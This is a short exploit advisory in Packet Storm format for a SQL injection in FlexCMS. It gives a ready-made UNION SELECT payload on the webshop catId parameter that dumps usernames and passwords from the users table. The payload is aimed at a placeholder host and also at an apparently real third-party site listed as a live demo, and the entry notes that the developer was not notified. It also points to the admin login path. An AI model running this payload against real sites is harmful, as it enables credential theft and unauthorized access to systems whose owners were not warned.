FlexCMS SQL Injection

2009-02-09T00:00:00
ID PACKETSTORM:74796
Type packetstorm
Reporter MisterRichard
Modified 2009-02-09T00:00:00

Description

                                        
                                            `AUTHOR: MisterRichard  
  
FlexCMS Remote SQL Injection  
  
Discovered by MisterRichard.  
  
Developer site: http://www.flexcms.dk/  
  
Developer has not been notified.  
  
Live demo:  
  
Injection: www.target.com/flx/webshop/?catId=145%20union%20all%20select%201,2,3,concat(username,char(58),password)+from+users--  
  
http://www.radikalungdom.dk/flx/webshop/?catId=145%20union%20all%20select%201,2,3,concat(username,char(58),password)+from+users--  
  
Admin login site:  
  
http://target.com/flexadmin/  
  
Greetz, agonx, kollek, cardingnu  
  
  
`